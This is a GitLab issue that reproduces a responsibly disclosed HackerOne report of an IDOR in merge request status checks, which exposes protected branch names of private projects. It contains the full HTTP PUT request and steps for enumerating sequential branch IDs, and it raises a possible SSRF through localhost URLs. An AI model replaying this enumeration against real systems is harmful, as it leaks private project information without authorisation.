Skip to content
GitLab Next
Closed
Created by GitLab SecurityBot@gitlab-securitybotReporter

IDOR in setting status check of merge request allows adding protected branches of private projects and discloses the branch names

HackerOne report #1294017 by ashish_r_padelkar on 2021-08-06, assigned to GitLab Team:

Report | How To Reproduce

Report

Summary

Hello,

There is a new feature currently available only on gitlab.com https://gitlab.com/<GroupName>/<ProjectName>/edit in Merge Request section named Status Checks

While adding a new status check, the request is vulnerable to IDOR for branch names. If you just replace IDs of branches, you can set/get their name even if they are belong to private project where you don't have any access. The IDs are sequential so you can easily obtain the names in bulk.

Steps to reproduce

  1. Login as a maintainer in your project and go to https://gitlab.com/<GroupName>/<ProjectName>/edit in Merge Request section , click on Add Status Check button.

  2. Add your inputs.(allows adding localhost urls too . I am bringing this to your attention as normally gitlab wont allow localhost urls). select your branch in branch dropdown and add. Capture the request like below.

PUT /api/v4/projects/23887195/external_status_checks/50 HTTP/2  
Host: gitlab.com  
Cookie: 1  
Content-Length: 120  
Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"  
Accept: application/json, text/plain, */*  
X-Csrf-Token: 1  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com/privategroup4321/githubimport/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

{"external_url":"http://127.0.0.1/","id":50,"name":"Anything","protected_branch_ids":[41438448]}

  1. just replace the value of protected_branch_ids in above request to any protected branch ID that may belong to private project that you dont have access to. these IDs are sequential.

  2. Send the request and you can see the protected branch name in response as well as UI.

  3. This way you can obtain protected branch names of any project irrespective their visibilities!

What is the current bug behavior?

Able to fetch protected branch names of private projects and create a status check using those.

What is the expected correct behavior?

Only branches belong to the projects should be added in status check.

Output of checks

This bug happens on GitLab.com GitLab Enterprise Edition 14.2.0-pre 62864aa6970

As mentioned above, this feature is not yet available in local installations.

Regards,
Ashish

Impact

Able to fetch protected branch names of private projects and create a status check using those.

The request also takes URL as an input and it allows adding localhost urls such as http://127.0.0.1 . I am currently not sure about this wether this is vulnerable to Blind SSRF as this feature is not available on local installations yet. The request of this URL is sent when merge request is updated.

I would have checked for SSRF too if the feature was available on local but I will update about this later whenever the feature is available on local installation and if its vulnerable to blind ssrf.

How To Reproduce

Please add reproducibility information to this section:

Edited by Dan Jensen